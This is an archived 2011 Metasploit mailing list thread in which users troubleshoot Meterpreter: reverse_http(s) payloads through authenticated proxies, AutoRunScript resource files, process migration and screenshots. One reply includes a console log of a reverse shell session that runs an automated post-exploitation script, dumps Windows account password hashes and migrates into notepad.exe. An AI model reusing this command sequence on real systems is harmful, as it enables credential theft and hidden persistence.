Metasploit mailing list archives
Re: News from Metasploit 4.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 16:40:11 -0500
Hi Carlos,

Thanks for the heads-up. But do you know why every time that I call screenshot or screengrab the lynx browser is called? Is there a way to disable it?

run migrate -f crashes here, so I have to use run post/windows/manage/migrate, but the old process name is still on the task manager list even when the migration is completed. Any way to ask run post/windows/manage/migrate to kill the old process?

Thanks

On Sat, Aug 27, 2011 at 4:02 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:
screenshot is now part of stdapi so need to load espia, migrate -f works fine for me

msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.115:1572) at 2011-08-27 17:00:17 -0400
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.115:1572) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc'
[*] Running Command List ...
[*] Running command sysinfo
Computer : CARLOS-192FCD91
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
[*] Running command getuid
Server username: CARLOS-192FCD91\Administrator
[*] Running command load priv
[-] The 'priv' extension has already been loaded.
[*] Running command hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[*] Running command run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] Running command run migrate -f
[*] Current server process: meter_mac1.exe (2752)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2896
[*] New server process: notepad.exe (2896)
[*] Running command screenshot
Screenshot saved to: /Users/carlos/Development/msf4/nGRCugLJ.jpeg
msf exploit(handler) > cat /tmp/sample.rc
[*] exec: cat /tmp/sample.rc
sysinfo
getuid
load priv
hashdump
run checkvm
run migrate -f
screenshot
msf exploit(handler) >

On Aug 27, 2011, at 2:36 PM, Richard Miles wrote:

Hi Carlos,

I know you are the creator of these resources and I have tested the multi_console_command script and now the module post/multi/gather/run_console_rc_file, but they never worked for me. Maybe I'm doing something wrong.

I tried calling both of them before and after calling "use exploit/multi/handler", and when I get the connection back from meterpreter nothing happens, the commands are never executed, or at least the output is never displayed on the screen.

I'm feeling very foul. Is there a chance for you to show step by step how you do it?

I tested both now again with metasploit 4.

Thanks.

On Fri, Aug 26, 2011 at 4:12 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:

AutoRunScript is for Meterpreter Scripts/Post Modules, what you are showing would be considered a resource file, look at the multi_console_command script or the post module post/multi/gather/run_console_rc_file to achieve what you want and use that resource file as an option.

On Aug 26, 2011, at 4:10 PM, Richard Miles wrote:

Hi Egypt,

It's awesome, thanks for the information. Also, do you have a working version for 64 bits?

Any follow-up on the other 2 questions in the e-mail?

Thanks

On Fri, Aug 26, 2011 at 9:20 AM, <egypt () metasploit com> wrote:

Yes, reverse_http(s) both use the WinInet API, and as such, use IE's proxy configuration, including credentials.

egypt

On Fri, Aug 26, 2011 at 2:28 AM, Richard Miles <richard.k.miles () googlemail com> wrote:

Hey Patrick,

Awesome, with the new reverse_http or reverse_https? Metasploit 4?

Thanks

On Thu, Aug 25, 2011 at 7:37 PM, Patrick Webster <patrick () aushack com> wrote:

Hey Richard,

I cannot guarantee 100%, but re: point #1, I have successfully used the stager to get around proxies with auth about 2 months ago.

-Patrick

On Fri, Aug 26, 2011 at 8:42 AM, Richard Miles <richard.k.miles () googlemail com> wrote:

Hi,

A friend of mine was talking about some great improvements in Metasploit 4. I checked the blog and it talks very briefly about it; what most caught my attention is that reverse_http and reverse_https were updated, and meterpreter scripts / resources too.

I have 3 questions...

1 - Are the new reverse_http and reverse_https now as good as passiveX was? I mean, can we use it completely over http or https (even the stager), and is the payload smart enough to get the proxy IP and port from the browser and re-use the same credential (in case the proxy requires auth)?
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework